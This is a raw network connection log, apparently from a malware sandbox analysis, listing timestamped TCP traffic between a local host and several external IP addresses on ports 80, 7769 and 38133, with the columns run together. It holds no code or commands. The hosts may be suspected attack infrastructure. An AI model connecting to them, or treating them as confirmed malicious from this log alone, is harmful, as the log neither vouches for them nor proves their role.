                                                                                                                                  Dec 18, 2021 15:32:29.084122896 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:29.084139109 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:29.084155083 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:29.084173918 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:29.084173918 CET498507769192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:32:29.084192038 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:29.084202051 CET498507769192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:32:29.084209919 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:29.084225893 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:29.084448099 CET498507769192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:32:29.146634102 CET77694985045.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:29.189285040 CET498507769192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:32:31.274189949 CET4985180192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:31.505074978 CET8049851222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:31.519602060 CET4985180192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:31.519809008 CET4985180192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:31.519824982 CET4985180192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:31.749718904 CET8049851222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:32.684422016 CET8049851222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:32.684463978 CET8049851222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:32.686935902 CET4985180192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:32.687061071 CET4985180192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:32.812160015 CET4985280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:32.923970938 CET8049851222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:33.078929901 CET8049852218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:33.086544991 CET4985280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:33.086858034 CET4985280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:33.086982012 CET4985280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:33.347290039 CET8049852218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:34.302033901 CET8049852218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:34.302064896 CET8049852218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:34.305238962 CET4985280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:34.305313110 CET4985280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:34.428497076 CET4985380192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:34.570796013 CET8049852218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:34.660795927 CET8049853190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:34.661007881 CET4985380192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:34.661170959 CET4985380192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:34.661185980 CET4985380192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:34.891381979 CET8049853190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:35.668797016 CET8049853190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:35.670022011 CET8049853190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:35.670147896 CET4985380192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:35.670183897 CET4985380192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:35.695687056 CET4985780192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:35.911602974 CET8049853190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:35.983850956 CET8049857211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:35.983987093 CET4985780192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:35.984163046 CET4985780192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:35.984183073 CET4985780192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:36.272681952 CET8049857211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:37.251116037 CET8049857211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:37.251154900 CET8049857211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:37.251312971 CET4985780192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:37.251744032 CET4985780192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:37.332312107 CET4985980192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:37.495105028 CET8049859148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:37.495348930 CET4985980192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:37.539577007 CET8049857211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:37.882457018 CET4985980192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:37.882508993 CET4985980192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:38.045181036 CET8049859148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:38.607162952 CET8049859148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:38.608863115 CET8049859148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:38.608951092 CET4985980192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:39.340681076 CET4985980192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:39.444562912 CET4986080192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:39.504694939 CET8049859148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:39.704730034 CET8049860218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:39.704869032 CET4986080192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:39.704998016 CET4986080192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:39.705285072 CET4986080192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:39.964896917 CET8049860218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:40.590053082 CET8049860218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:40.590073109 CET8049860218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:40.590204954 CET4986080192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:40.590272903 CET4986080192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:40.617727041 CET4986538133192.168.2.686.107.197.138
                                                                                                                                  Dec 18, 2021 15:32:40.640829086 CET381334986586.107.197.138192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:40.641020060 CET4986538133192.168.2.686.107.197.138
                                                                                                                                  Dec 18, 2021 15:32:40.766289949 CET4986680192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:40.851715088 CET8049860218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:40.987030029 CET4986538133192.168.2.686.107.197.138
                                                                                                                                  Dec 18, 2021 15:32:41.015799999 CET8049866190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:41.015949011 CET4986680192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:41.016383886 CET4986680192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:41.016406059 CET4986680192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:41.069042921 CET381334986586.107.197.138192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:41.143053055 CET381334986586.107.197.138192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:41.246783972 CET4986538133192.168.2.686.107.197.138
                                                                                                                                  Dec 18, 2021 15:32:41.259682894 CET8049866190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:42.024945974 CET8049866190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:42.024970055 CET8049866190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:42.025032043 CET4986680192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:42.025051117 CET4986680192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:42.025127888 CET4986680192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:42.258034945 CET8049866190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:42.373229027 CET4987480192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:42.534137011 CET8049874148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:42.534272909 CET4987480192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:42.534523964 CET4987480192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:42.534574986 CET4987480192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:42.698156118 CET8049874148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:42.920234919 CET4986538133192.168.2.686.107.197.138
                                                                                                                                  Dec 18, 2021 15:32:42.944228888 CET381334986586.107.197.138192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:43.043705940 CET4986538133192.168.2.686.107.197.138
                                                                                                                                  Dec 18, 2021 15:32:43.260270119 CET8049874148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:43.260555983 CET4987480192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:43.261176109 CET8049874148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:43.261312008 CET4987480192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:43.305618048 CET4987680192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:43.422256947 CET8049874148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:43.556540966 CET8049876218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:43.558054924 CET4987680192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:43.558549881 CET4987680192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:43.558617115 CET4987680192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:43.799746037 CET8049876218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:44.724616051 CET8049876218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:44.724641085 CET8049876218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:44.724751949 CET4987680192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:44.724817038 CET4987680192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:44.772818089 CET4988080192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:44.969824076 CET8049876218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:45.008229017 CET8049880211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:45.008321047 CET4988080192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:45.008470058 CET4988080192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:45.008481979 CET4988080192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:45.238506079 CET8049880211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.205908060 CET8049880211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.205935955 CET8049880211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.206023932 CET4988080192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:46.206093073 CET4988080192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:46.230134964 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.284567118 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.284729958 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.285000086 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.339369059 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.339426994 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.339462996 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.339498043 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.339539051 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.339581966 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.339605093 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.339621067 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.339629889 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.339656115 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.339667082 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.339895010 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.339930058 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.339955091 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.340023041 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.394578934 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.394711971 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.394743919 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.394768000 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.394789934 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.394839048 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.394865036 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.394890070 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.394912004 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.394933939 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.394956112 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.394957066 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.394987106 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.394998074 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.395013094 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.395037889 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.395052910 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.395061970 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.395087957 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.395097017 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.395113945 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.395136118 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.395138979 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.395164967 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.395189047 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.395200014 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.395237923 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.436604023 CET8049880211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.449954987 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450027943 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450062990 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450102091 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450138092 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450145960 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.450171947 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450208902 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450232983 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.450243950 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450280905 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450297117 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.450316906 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450352907 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450386047 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450412035 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.450421095 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450458050 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450459957 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.450491905 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450526953 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450541019 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.450562000 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450566053 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.450597048 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450629950 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450664043 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450680017 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.450699091 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450710058 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.450731993 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450766087 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450798988 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450814009 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.450834036 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450856924 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.450871944 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450903893 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450937033 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450949907 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.450969934 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.450984001 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.451004028 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.451039076 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.451072931 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.451086998 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.451107025 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.451122999 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.451143026 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.451176882 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.451210976 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.451225042 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.451245070 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.451262951 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.451277971 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.451312065 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.451345921 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.451356888 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.451400042 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:46.505709887 CET8049882185.112.83.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:46.559657097 CET4988280192.168.2.6185.112.83.8
                                                                                                                                  Dec 18, 2021 15:32:48.337384939 CET4988380192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:48.500739098 CET8049883148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:48.500838041 CET4988380192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:48.501018047 CET4988380192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:48.501070976 CET4988380192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:48.663861036 CET8049883148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:49.046837091 CET8049883148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:49.047065020 CET4988380192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:49.047713995 CET8049883148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:49.047817945 CET4988380192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:49.076874018 CET4988480192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:49.208751917 CET8049883148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:49.309246063 CET8049884211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:49.309422016 CET4988480192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:49.309568882 CET4988480192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:49.309607029 CET4988480192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:49.548314095 CET8049884211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:50.492122889 CET8049884211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:50.492162943 CET8049884211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:50.492270947 CET4988480192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:50.492465973 CET4988480192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:50.519314051 CET4988780192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:50.682121038 CET8049887148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:50.682307959 CET4988780192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:50.682429075 CET4988780192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:50.682457924 CET4988780192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:50.725708961 CET8049884211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:50.845124960 CET8049887148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:51.125510931 CET4986538133192.168.2.686.107.197.138
                                                                                                                                  Dec 18, 2021 15:32:51.205085993 CET381334986586.107.197.138192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:51.224049091 CET8049887148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:51.225794077 CET4988780192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:51.226021051 CET8049887148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:51.226093054 CET4988780192.168.2.6148.0.74.229
                                                                                                                                  Dec 18, 2021 15:32:51.263078928 CET4988880192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:51.273994923 CET381334986586.107.197.138192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:51.274034023 CET381334986586.107.197.138192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:51.274049044 CET381334986586.107.197.138192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:51.274110079 CET4986538133192.168.2.686.107.197.138
                                                                                                                                  Dec 18, 2021 15:32:51.387171984 CET8049887148.0.74.229192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:51.490706921 CET8049888190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:51.490860939 CET4988880192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:51.491143942 CET4988880192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:51.491389036 CET4988880192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:51.726607084 CET8049888190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:52.582041025 CET8049888190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:52.582094908 CET8049888190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:52.582225084 CET4988880192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:52.582314014 CET4988880192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:52.611639977 CET4988980192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:52.819277048 CET8049888190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:52.833849907 CET8049889190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:52.834579945 CET4988980192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:52.834633112 CET4988980192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:52.834638119 CET4988980192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:53.062935114 CET8049889190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:53.844685078 CET8049889190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:53.845844984 CET4988980192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:53.847415924 CET8049889190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:53.847548962 CET4988980192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:32:53.937030077 CET4989080192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:54.068581104 CET8049889190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:54.221106052 CET8049890211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:54.224226952 CET4989080192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:54.224349022 CET4989080192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:54.224359035 CET4989080192.168.2.6211.59.14.90
